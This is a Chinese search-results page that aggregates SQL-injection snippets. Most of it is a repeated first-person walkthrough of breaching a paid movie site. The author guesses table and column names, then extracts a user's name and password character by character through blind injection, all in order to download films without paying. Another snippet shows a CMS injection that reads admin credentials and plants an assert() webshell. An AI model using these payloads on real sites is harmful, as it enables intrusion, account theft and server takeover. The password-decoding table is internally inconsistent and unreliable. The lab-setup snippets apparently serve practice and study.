精华内容
下载资源
问答
  • SQL注入网站详解

    2018-12-12 21:33:50
    SQL注入网站详解
  • ASP+ACCESS带SQL注入网站源码,完美适合网络安全初学者的SQL注入案例
  • sql注入网站源码

    2019-04-09 19:01:44
    挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
  • SQL注入网练习站自建源码4套,都是收集的,贡献出来!有的没测试,基本都差不多,对于初学者不错。 SQL注入网练习站自建源码4套,都是收集的,贡献出来!有的没测试,基本都差不多,对于初学者不错。
  • SQL注入网站入侵实例

    2019-09-29 16:24:38
    这几天闲得无聊,想上网Down几部电影来看,...寻找入口 准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示信息。 尝试几个有传入参数的页面,逐个测试是否...
    这几天闲得无聊,想上网Down几部电影来看,找了找都是要Money的,不爽,花时间跑去汇钱还不如找个有漏洞的黑一黑。于是,计划开始:
    (为避免不必要的误会,网址、用户名、密码做了一些修改,不过方法是100%原汁原味)

      1.寻找入口
      准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示信息。
      尝试几个有传入参数的页面,逐个测试是否有SQL注入漏洞,识别方法为:把网址栏的ID=***x加个号,或在表单输入号,如果提示表达式错误,表示有漏洞可注入,另外,通过这个方式可以得到程序所用的数据库类型
      经测试,发现有几个页面有注入漏洞,决定从http://www.movie.com/movie.ASP?ID=1000入手,输入http://www.movie.com/movie.ASP?ID=1000,得到信息:数据库用是的ACCESS,提示ArticleID=1000附近有表达式错误,嘿,原来是个用文章系统改出来的电影站。

      2.观察网站环境
      网站提供的功能有:影片分类、影片介绍、影片搜索,影片的ID大概从1000-1500之间。

      3.猜表名查清楚敌人情况之后,开始行动
      行动的第一步都是从猜表名开始,http://www.movie.com/movie.ASP?ID=1000,把1000改成(select count(1) from user),那么,他原来的SQL语句将会变成:
    Select [字段列表] from [影片表] where 影片ID=(select count(1) from user)
      如果猜对表名,将有可能出现下面三种情况:
      A.显示某部影片的信息(巧合的情况)
      B.显示影片找不到(如果有判断是否为EOF)
      C.提示错误信息(EOF OR BOF)
      如果猜错,将会直接提示找不到表名。
      把user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu这些常用表名一个个放进去试,一般成功率都不低于80%
      结果,成功猜中该网站的用户名表名为users

      4.猜列名
      至于猜列名,不用我介绍大家都应该清楚怎么做了,把(select count(1) from users)改成(select count(id) from users),如没提示"找不到字段"就表示字段名是正确的,字段一般不用太费力,在Login的时候看看表单的名称就大概可以猜到一些了。
      果然,这个网站也不例外,用户表中字段为ID(数字),UserID(文本),Password(文本),积分字段猜得比较费劲,为money

      5.锁定目标
      让users表只返回money最多的一个记录,以便进行猜解、并避免猜中一些没money的用户名:
    http://www.movie.com/movie.ASP?ID=(select 1000 from user where money>1000)   结果:提示子查询不能返回两条以上记录
      锁定>10000,提示不变;
      锁定>100000,提示找不到记录,说明没有积分大于10万的用户;
      从1万到10万逐步缩小范围,得知积分大于25500只有一条记录。

      6.计算用户名及密码长度
      因为影片的ID大概从1000-1500之间,可以用UserID的长度+1000得出的数(即影片ID)计算用户名长度,键入:
    http://www.movie.com/movie.ASP?ID=(select len(UserID) %2B 1000 from user where money>25500)%2B是什么?因为地址栏的+号request出来会变成空格,所以+号要用UrlEncode过的%2B表示。结果返回片名为《双雄》的影片,呵呵,怎么办?不是有搜索功能吗?拿去搜一下,看看影片ID是多少吧。
      搜索,得出影片ID是1006,显然,用户名长度为1006-1000=6;同样方法,得出密码的长度为8

      7.分步破解用户名
      有点SQL应用经验的人应该都想到方法了,来,敲入:
    http://www.movie.com/movie.ASP?ID=(select asc(mid(UserID,1,1)) %2B 1000 from user where money>25500)
      呵呵,又返回一部影片,搜索一下,影片ID为1104,即asc(mid(UserID,1,1))=104
      同样方法,得出:
      asc(mid(UserID,2,1))=117
      asc(mid(UserID,3,1))=97
      asc(mid(UserID,4,1))=106
      asc(mid(UserID,5,1))=105
      asc(mid(UserID,6,1))=101
      因为len(UserID)=6,所以算到第6位就行了,查asc对应表(会编程的可以写几句话算出来),chr(104)=h,chr(117)=u,chr(97)=a,chr(106)=j,chr(105)=i,chr(101)=e
    连起来,用户名就是huajie

      8.同样的方法破解密码
      asc(mid(Password,1,1))=49 => chr(49)=1
      asc(mid(Password,2,1))=57 => chr(49)=9
      asc(mid(Password,3,1))=55 => chr(49)=7
      asc(mid(Password,4,1))=56 => chr(49)=8
      asc(mid(Password,5,1))=48 => chr(49)=0
      asc(mid(Password,6,1))=55 => chr(49)=7
      asc(mid(Password,7,1))=55 => chr(49)=1
      asc(mid(Password,8,1))=55 => chr(49)=2
      拼起来:19780712,哈哈,又是用生日做密码的!
      接下来,输入用户名和密码,登录系统,成功!猜表名列表之前用了30分钟,破解用了15分钟,45分钟搞掂了一个站。

    转载于:https://www.cnblogs.com/yxbsmx/articles/1425211.html

    展开全文
  • centos搭建宝塔 一、打开centos系统虚拟机,输入 ip addr获得IP地址。 (没有centos系统虚拟机的,需要先安装好系统。) 自取centos安装教程 二、打开xshell6新建会话,填入IP地址连接 连接成功后会显示绿色点点 ...

    centos搭建宝塔

    一、打开centos系统虚拟机,输入 ip addr获得IP地址。

    (没有centos系统虚拟机的,需要先安装好系统。) 自取centos安装教程
    在这里插入图片描述

    二、打开xshell6新建会话,填入IP地址连接

    在这里插入图片描述
    连接成功后会显示绿色点点

    在这里插入图片描述

    接着安装宝塔面板(装过可跳过)

    安装命令:yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh

    直接复制命令即可

    成功后输入bt得到宝塔面板

    在这里插入图片描述

    输入14可得到宝塔网址、用户名和密码

    在这里插入图片描述

    宝塔安装sqllab

    三、按得到的IP网址、用户名和密码登录宝塔首页

    点击添加网站,输入域名,选择MySQL数据库,点击提交。

    在这里插入图片描述
    点击根目录,点击上传,上传sqli-labs-master文件并解压,
    在这里插入图片描述
    点回网站,点击a.com输入域名,端口自己设置。点击添加,点击域名即可创建成功。

    四、访问自己的IP地址

    在这里插入图片描述

    点击第一行小字
    若显示以下页面则成功
    在这里插入图片描述

    若显示以下页面则按错误提示检查文件

    在这里插入图片描述

    如图,打开相关文件查看29行,得到文件和密码提示

    在这里插入图片描述

    打开相关文件编辑并修改root密码

    在这里插入图片描述
    root密码获取如下图
    在这里插入图片描述

    然后回去刷新即可成功搭建SQL注入网站

    若依然没有反应则更换PHP版本,最好换至53或54的版本。

    展开全文
  • 齐博cms整站系统,是目前建站系统用的较多...于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用。 在对整个网站代码的漏洞检测中发现d...

    齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用。

    在对整个网站代码的漏洞检测中发现do目录下的activate.php存在可以插入恶意参数的变量值,我们来看下这个代码:

    齐博cms漏洞详情:

    从代码里发现这个代码的功能是发送序列号激活的一个功能,从激活的链接地址里,可以看出do/activate.php?job=activate&safe_id=$safe_id 是用来激活序列号的,我们从整个齐博的代码里找到了账号激活的一个大体的过程,首先会注册一个账号,注册账号后会需要发送邮件到用户的邮箱里,邮箱里验证的是safe_id这个值,这个safe_id这个值经过md5的解密后直接生成uaername跟用户的密码,然后再传入到get_safe()这个函数,在这个inc文件夹下的class.user.php代码里找得到这个函数。

    我们发现这个get_safe()函数是用来传递用户的激活信息,并进行安全过滤与判断的,从这里我们可以插入恶意的sql语句到网站后端里去,并直接到数据库中执行该语句,我们本地来测试一下是否可以sql注入:

    从上图我们可以看出可以进行网站sql注入攻击,那么我们就可以进行查询数据库的账号密码操作,比如查询网站超级管理员的账号密码:and (updatexml(1,concat(0x7e,(substring((selectusername from qb_memberdata where groupid=3),1, 这个语句就是查询超级管理员的账号密码,通过这里我们查到网站的管理员账号密码,登录后台,我们进行远程代码提权了。

    增加栏目为${assert($_POST[safe])},一句话后门的代码会直接写入到/data/guide_fid.php文件,用一句话木马连接工具连接即可。

    关于齐博cms漏洞的修复,我们SINE安全建议网站的运用者,尽快升级齐博CMS到最新版本,对于sql注入语句进行安全过滤与sql注入防护,对网站的后台默认地址进行详细的更改为其他的文件名。对于前端网站进行sql语句查询的时候进行网站安全白名单系统部署,网站后台的账号密码设置的复杂一些,尽可能的用数字+大小写+特殊字符组合。

    展开全文
  • SQL注入网站入侵实例

    2007-02-15 09:19:00
    这几天闲得无聊,想上网Down几部电影来...寻找入口 准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示信息。 尝试几个有传入参数的页面,逐个测试是否有SQL注
    这几天闲得无聊,想上网Down几部电影来看,找了找都是要Money的,不爽,花时间跑去汇钱还不如找个有漏洞的黑一黑。于是,计划开始:
    (为避免不必要的误会,网址、用户名、密码做了一些修改,不过方法是100%原汁原味)

      1.寻找入口
      准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示信息。

      尝试几个有传入参数的页面,逐个测试是否有SQL注入漏洞,识别方法为:把网址栏的ID=***x加个号,或在表单输入号,如果提示表达式错误,表示有漏洞可注入,另外,通过这个方式可以得到程序所用的数据库类型。

      经测试,发现有几个页面有注入漏洞,决定从http://www.movie.com/movie.asp?ID=1000入手,输入http://www.movie.com/movie.asp?ID=1000,得到信息:数据库用是的ACCESS,提示ArticleID=1000附近有表达式错误,嘿,原来是个用文章系统改出来的电影站。

      2.观察网站环境
      网站提供的功能有:影片分类、影片介绍、影片搜索,影片的ID大概从1000-1500之间。

      3.猜表名查清楚敌人情况之后,开始行动
      行动的第一步都是从猜表名开始,http://www.movie.com/movie.asp?ID=1000,把1000改成(select count(1) from user),那么,他原来的SQL语句将会变成:
    Select [字段列表] from [影片表] where 影片ID=(select count(1) from user)
      如果猜对表名,将有可能出现下面三种情况:
      A.显示某部影片的信息(巧合的情况)
      B.显示影片找不到(如果有判断是否为EOF)
      C.提示错误信息(EOF OR BOF)
      如果猜错,将会直接提示找不到表名。
      把user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu这些常用表名一个个放进去试,一般成功率都不低于80%
      结果,成功猜中该网站的用户名表名为users

      4.猜列名
      至于猜列名,不用我介绍大家都应该清楚怎么做了,把(select count(1) from users)改成(select count(id) from users),如没提示"找不到字段"就表示字段名是正确的,字段一般不用太费力,在Login的时候看看表单的名称就大概可以猜到一些了。
      果然,这个网站也不例外,用户表中字段为ID(数字),UserID(文本),Password(文本),积分字段猜得比较费劲,为money

      5.锁定目标
      让users表只返回money最多的一个记录,以便进行猜解、并避免猜中一些没money的用户名:
    http://www.movie.com/movie.asp?ID=(select 1000 from user where money>1000)   结果:提示子查询不能返回两条以上记录
      锁定>10000,提示不变;
      锁定>100000,提示找不到记录,说明没有积分大于10万的用户;
      从1万到10万逐步缩小范围,得知积分大于25500只有一条记录。

      6.计算用户名及密码长度
      因为影片的ID大概从1000-1500之间,可以用UserID的长度+1000得出的数(即影片ID)计算用户名长度,键入:
    http://www.movie.com/movie.asp?ID=(select len(UserID) %2B 1000 from user where money>25500)%2B是什么?因为地址栏的+号request出来会变成空格,所以+号要用UrlEncode过的%2B表示。结果返回片名为《双雄》的影片,呵呵,怎么办?不是有搜索功能吗?拿去搜一下,看看影片ID是多少吧。
      搜索,得出影片ID是1006,显然,用户名长度为1006-1000=6;同样方法,得出密码的长度为8

      7.分步破解用户名
      有点SQL应用经验的人应该都想到方法了,来,敲入:
    http://www.movie.com/movie.asp?ID=(select asc(mid(UserID,1,1)) %2B 1000 from user where money>25500)
      呵呵,又返回一部影片,搜索一下,影片ID为1104,即asc(mid(UserID,1,1))=104
      同样方法,得出:
      asc(mid(UserID,2,1))=117
      asc(mid(UserID,3,1))=97
      asc(mid(UserID,4,1))=106
      asc(mid(UserID,5,1))=105
      asc(mid(UserID,6,1))=101
      因为len(UserID)=6,所以算到第6位就行了,查asc对应表(会编程的可以写几句话算出来),chr(104)=h,chr(117)=u,chr(97)=a,chr(106)=j,chr(105)=i,chr(101)=e
    连起来,用户名就是huajie

      8.同样的方法破解密码
      asc(mid(Password,1,1))=49 => chr(49)=1
      asc(mid(Password,2,1))=57 => chr(49)=9
      asc(mid(Password,3,1))=55 => chr(49)=7
      asc(mid(Password,4,1))=56 => chr(49)=8
      asc(mid(Password,5,1))=48 => chr(49)=0
      asc(mid(Password,6,1))=55 => chr(49)=7
      asc(mid(Password,7,1))=55 => chr(49)=1
      asc(mid(Password,8,1))=55 => chr(49)=2
      拼起来:19780712,哈哈,又是用生日做密码的!
      接下来,输入用户名和密码,登录系统,成功!猜表名列表之前用了30分钟,破解用了15分钟,45分钟搞掂了一个站。接下来做什么?当然是先Down几G的电影下来再说了。 
     
    展开全文
  • sql注入网站获取管理员密码第一天

    千次阅读 2016-11-22 00:09:48
    1、通过JSky对该网站进行安全扫描,得出如下可注入点: 2、选取第一个网址,在后方加入单引号,得出如下: 可以判断: 网站使用的是access数据库,通过jet引擎连接数据库。
  • ...........(为避免不必要的误会,网址... 尝试几个有传入参数的页面,逐个测试是否有SQL注入漏洞,识别方法为:把网址栏的ID=***x加个号,或在表单输入号,如果提示表达式错误,表示有漏洞可注入,另外,通过这个方式
  • sql注入实战网站源码

    2019-02-01 18:04:58
    sql注入实战网站的源码 练习工具sql注入 手工sql注入
  • SQL注入

    2020-12-14 17:22:12
    比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击 如何防止SQL注入 不要使用动态SQL 避免将用户提供的输入直接放入SQL语句中;最好使用准备好的...
  • 内含 SQL注入实战教程.txt
  • 网站SQL注入

    千次阅读 2019-01-24 15:44:02
    JSP注入攻击tomcat服务器小案例 https://blog.csdn.net/u012881836/article/details/51242641   原理 上传一个可以执行的jsp文件,然后打开这个文件。这个文件里,可以写一些代码,执行一些特殊操作。     ...
  • sql注入开源网站

    千次阅读 2021-01-30 12:35:21
    SQL注入的文中提到开源网站以及靶机需要自取: 链接:https://pan.baidu.com/s/1NgO64ZVT7iFXCLiS--budg 提取码:u7n8 复制这段内容后打开百度网盘手机App,操作更方便哦 开源网站漏洞复现见博客:...
  • sql注入

    2019-08-24 10:16:07
    最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.当应用程序使用输入内容来构造动态sql语句以访问数据库...
  • sql注入防御方法 解决SQL注入问题的关键是对所有可能来自用户输入的数据进行严格的检查、对数据库 配置使用最小权限原则。通常修复使用的方案有: 一、代码层面 1.对输入进行严格的转义和过滤 2.使用参数化...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 6,829
精华内容 2,731
关键字:

sql注入网站